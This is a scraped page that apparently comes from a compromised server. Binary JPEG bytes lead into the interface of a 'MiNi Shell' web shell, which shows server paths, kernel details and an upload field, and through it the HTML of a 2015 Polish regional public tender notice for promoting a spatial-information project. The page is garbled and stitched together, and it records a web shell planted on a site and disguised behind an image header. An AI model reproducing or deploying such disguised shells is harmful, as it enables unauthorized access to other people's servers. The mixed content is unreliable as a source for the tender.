JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151009/267360-N-2015.html

<p class="kh_header"><b>Kielce: PROMOCJA PROJEKTU E-ŚWIĘTOKRZYSKIE BUDOWA
SYSTEMU INFORMACJI PRZESTRZENNEJ WOJEWÓDZTWA
ŚWIĘTOKRZYSKIEGO</b><br>
<b>Numer ogłoszenia: 267360 - 2015; data zamieszczenia: 09.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PROMOCJA PROJEKTU E-ŚWIĘTOKRZYSKIE BUDOWA
SYSTEMU INFORMACJI PRZESTRZENNEJ WOJEWÓDZTWA
ŚWIĘTOKRZYSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia
są działania mające na celu promocję Projektu, pn.:e-świętokrzyskie Budowa Systemu Informacji
Przestrzennej Województwa Świętokrzyskiego, realizowanego w ramach RPO WŚ zgodne z
wymaganiami dotyczącymi działań informacyjnych i promocyjnych, według Rozporządzenia Komisji
(WE) nr 1828/2006 z dnia 8 grudnia 2006r. 2.Zamówienie zostało podzielone na 2 części, z
dopuszczeniem składania ofert częściowych: część I zamówienia wykonanie projektu graficznego,
wydruku oraz kolportażu insertów zamieszczanych w dzienniku o zasięgu regionalnym, obejmującym
województwo świętokrzyskie, część II zamówienia kompleksowa organizacja i obsługa dwudniowej
konferencji naukowo - technicznej wraz z jedną konferencją prasową i warsztatami w drugi dzień
konferencji - pn.: Konferencja podsumowująca realizację Projektu e-świętokrzyskie Budowa SystemuInformacji Przestrzennej Województwa Świętokrzyskiego oraz cateringiem. 3.Wykonawcy mogą złożyć
ofertę na dwie części zamówienia lub wybraną część zamówienia. 4.Szczegółowy opis przedmiotu
zamówienia dla każdej z części zawarty został w załączniku nr 1 do SIWZ. 5.Zamówienie musi zostać
zrealizowane zgodnie z dokumentem pn.: Obowiązki Beneficjenta w zakresie działań informacyjnych i
promocyjnych związanych z realizacją projektu w ramach Regionalnego Programu Operacyjnego
Województwa Świętokrzyskiego na lata 2007-2013 (przyjętego Uchwałą NR 1836/13 Zarządu
Województwa Świętokrzyskiego w dniu 24 kwietnia 2013 r.) dostępnym na stronie internetowej:
http://www.2007-2013.rpo-swietokrzyskie.pl/s,95,Obowiazki_
Beneficjentow_w_zakresie_dzialan_informacyjnych_i_promocyjnych.html. 6.Wykonawca zobowiązany
będzie do stałej współpracy i konsultacji z zamawiającym na każdym etapie realizacji przedmiotowego
zamówienia. 7.Zamawiający zastrzega sobie możliwość kontrolowania realizacji przedmiotu zamówienia
na każdym etapie prac. 8.Wykonawca zobowiązany będzie do pozostania z zamawiającym w stałym
kontakcie i do informowania go na bieżąco o stanie przygotowań do organizowanej konferencji.
9.Zamawiający oczekuje od Wykonawcy na całym etapie realizowania zamówienia, należytej
staranności, wysokiej jakości świadczonych usług oraz profesjonalnego podejścia do jego wykonywania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.22.00-5, 79.82.40.00-6, 55.30.00.00-3, 55.12.00.00-7, 79.95.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I część zamówienia -o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają odpowiednią wiedze i doświadczenie. Zamawiający w I części zamówienia dokona oceny tego warunku na podstawie oświadczenia z art. 22 ust. 1 ustawy Pzp, wg wzoru stanowiącego dodatek nr 2A do SIWZ-oryginał. O udzielenie zamówienia mogą ubiegać się wykonawcy,
którzy posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia i
w powyższym zakresie składając ofertę na część II zamówienia wykażą, iż w ciągu ostatnich
trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie wykonali należycie co najmniej jedną (1) usługę polegającą na
zorganizowaniu wydarzenia promocyjnego takiego jak konferencja lub forum lub seminarium.
Zamawiający oceni spełnianie powyższego warunku na podstawie wykazu głównych usług,
wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości
(wskazanie wartości jest fakultatywne), przedmiotu, dat wykonania i podmiotów, na rzecz
których usługi zostały wykonane - wg wzoru określonego w dodatku nr 2D do SIWZ oraz
załączenia dowodów czy usługi te zostały wykonane należycie - oryginał lub kopia
poświadczona za zgodność z oryginałem przez wykonawcę; UWAGA: 1) Zgodnie z §1 ust. 4
rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów
dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te
dokumenty mogą być składane, w wykazie głównych usług wykonawca jest zobowiązany
wskazać jedynie usługi potwierdzające spełnianie warunków określonych w rozdziale V pkt.
1.A)1) SIWZ i załączenia dowodów należytego wykonania w stosunku do tych usług. 2)
Zgodnie z §1 ust. 2 w/w rozporządzenia dowodami, o których mowa w pkt. 1), są
poświadczenia albo oświadczenia wykonawcy, jeżeli z uzasadnionych przyczyn o
obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń. 3) Zgodnie z §1
ust. 3 w/w rozporządzenia, w przypadku gdy zamawiający jest podmiotem, na rzecz którego
usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku
przedkładania dowodów, o których mowa powyżej. 4) Jeżeli wykonawca polega na wiedzy i
doświadczeniu innych podmiotów (art. 26 ust. 2b) zobowiązany jest udowodnić, że będzie
dysponował zasobami w trakcie realizacji zamówienia. W szczególności za dowód uznaje się
pisemne zobowiązanie takich podmiotów (oryginał lub poświadczona notarialnie kopia) do
oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
5) Zgodnie z §7 ust. 2 w/w rozporządzenia w przypadku wykonawców wspólnie ubiegających
się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których
wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów
dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z
oryginałem odpowiednio przez wykonawcę lub te podmioty. Uwaga: a. Wykazanie się wykonaniem usługi spełniającej w/w warunek, polegającej na zorganizowaniu konferencji, w
której uczestniczyło co najmniej 100 osób będzie przez zamawiającego punktowane - zgodnie
z opisem zawartym w rozdziale XIII, pkt 3 SIWZ -OPIS KRYTERIÓW, KTÓRYMI
ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY WRAZ Z PODANIEM
ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT. b. Zamawiający informuje, iż
w przypadku gdy min. 1 wykazana usługa potwierdza spełnianie warunku udziału w
postępowaniu, w stosunku do pozostałych usług wykazanych w celu uzyskania większej ilości
punktowej nie będzie miał zastosowania art. 26 ust. 3 ustawy Pzp dotyczący uzupełniania
dokumentów. c. Zamawiający informuje, iż do wykazanych usług ponad wymagane na
potwierdzenie spełnienia warunku wiedzy i doświadczenia nie będzie miał zastosowania przepis art. 26 ust. 3 ustawy Pzp dotyczący uzupełniania dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim
potencjałem technicznym. Ocena w/w warunku udziału w postępowaniu będzie dokonana
według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art. ust. 1 ustawy Prawo
zamówień publicznych wg wzoru stanowiącego dodatek nr 2A do SIWZ-oryginał</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi
do wykonania zamówienia. Ocena w/w warunku udziału w postępowaniu będzie dokonana
według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo
zamówień publicznych wg wzoru stanowiącego dodatek nr 2A do SIWZ-oryginał</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Ocena w/w warunku udziału
w postępowaniu będzie dokonana według zasady spełnia/nie spełnia, na podstawie
Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych wg wzoru stanowiącego
dodatek nr 2A do SIWZ-oryginał</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez wykonawcę Formularz oferty - wg wzoru określonego w dodatku nr 1 do
SIWZ. 2.W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących
wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o
udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 3.Pełnomocnictwo określające
jego zakres - w przypadku gdy wykonawcę reprezentuje pełnomocnik (oryginał lub poświadczona
notarialnie kopia).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie
której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej
zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił
warunki takiej zmiany. 2.Zmiany niniejszej Umowy mogą nastąpić za zgodą Stron w formie pisemnego
aneksu pod rygorem nieważności. 3.Zamawiający dopuszcza możliwość zmiany wynagrodzenia
Wykonawcy w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT dla Przedmiotu
Umowy - zmianie ulega kwota podatku VAT i kwota brutto. 4.Zamawiający dopuszcza możliwość zmiany
terminu wykonania Umowy w przypadku zmiany terminów i zakończenia rzeczowej realizacji Projektu
e-świętokrzyskie Budowa Systemu Informacji Przestrzennej Województwa Świętokrzyskiego,
współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w
ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.
Zmiana terminu nie może powodować zmiany wynagrodzenia Wykonawcy. 5.Zamawiający dopuszcza
możliwość zmiany Umowy, która podyktowana będzie koniecznością dostosowania do wymagań i
wytycznych wynikających ze współfinansowania Projektu z Europejskiego Funduszu Rozwoju
Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata
2007-2013, w tym w szczególności warunków dotyczących kwalifikowalności wydatków - zmianie może
ulec termin wykonania Umowy o czas niezbędny na uwzględnienie powyższych zmian. Zmiana terminunie może powodować zmiany wynagrodzenia Wykonawcy. Zmiany umowy dotyczą I i II części
zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego, al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C 2 III piętro pokój nr 347.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2015 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego, al. IX
Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pok. 317 (Kancelaria Urzędu), III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane w ramach Indywidualnego Projektu Kluczowego
Województwa Świętokrzyskiego p.n. e-świętokrzyskie Budowa Systemu Informacji Przestrzennej
Województwa Świętokrzyskiego w ramach Działania 2.2 Budowa infrastruktury społeczeństwa
informacyjnego Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-
2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie projektu graficznego, wydruku oraz kolportażu insertów
zamieszczanych w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadaniem Wykonawcy
będzie wykonanie projektu graficznego, wydruku oraz kolportażu insertów. Inserty mają być
zamieszczone w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie.
Zakres ilościowy: 30 000 sztuk. Szczegółowy opis zawarty jest w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.22.00-5, 79.82.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Liczba projektów graficznych insertu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kompleksowa organizacja i obsługa dwudniowej konferencji naukowo -
technicznej wraz z jedną konferencją prasową i warsztatami w drugi dzień konferencji - pn.: Konferencja
podsumowująca realizację Projektu e-świętokrzyskie Budowa Systemu Informacji Przestrzennej
Województwa Świętokrzyskiego oraz cateringiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zadaniem Wykonawcy
będzie kompleksowa organizacja i obsługa dwudniowej konferencji naukowo - technicznej wraz z
jedną konferencją prasową i warsztatami w drugi dzień konferencji pn.: Konferencja
podsumowująca realizację Projektu e-świętokrzyskie Budowa Systemu Informacji Przestrzennej
Województwa Świętokrzyskiego oraz cateringiem. 2.Przed rozpoczęciem realizacji, Wykonawca ma
obowiązek wskazać koordynatora i jego zastępcę odpowiadających za realizację działań
związanych z organizacją i obsługą dwudniowej konferencji opisanych w załączniku nr 1 do SIWZ.
Dane kontaktowe koordynatora i zastępcy (numer telefonu komórkowego i e-mail) należy
przekazać Zamawiającemu. 3.Dwudniowa konferencja będzie składać się z: 1)Dzień pierwszy: a)
konferencji naukowo - technicznej - ok. 7 godzin w godz. 9:00 - 16:00, b)konferencji prasowej - ok.
30 min. - ok. godz. 10:30 - 11:00, odrębna sala na ok. 20 osób. 2)Dzień drugi: a)konferencji
naukowo - technicznej - ok. 7 godzin w godz. 9:00 - 16:00, b)warsztaty, pokazy, wystawy - ok. 7
godzin w godzinach od 9:00 - 16:00, odrębna sala na ok. 20 osób. 4.Ilość uczestników konferencji
naukowo-technicznej - dzień pierwszy: 150 osób i dzień drugi - 150 osób. 5.Miejsce konferencji:
teren województwa świętokrzyskiego. 6.Termin realizacji: do 30 listopada 2015r. Ostateczny termin
musi zostać ustalony z Zamawiającym i zaakceptowany przez Zamawiającego. 7.Kwestie
organizacyjne związane z osobami prowadzącymi, prelegentami oraz materiałami informacyjnopromocyjnymi
pozostają po stronie Zamawiającego. 8.Szczegółowy opis przedmiotu zamówienia
znajduje się w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.12.00.00-7, 79.95.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie Wykonawcy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com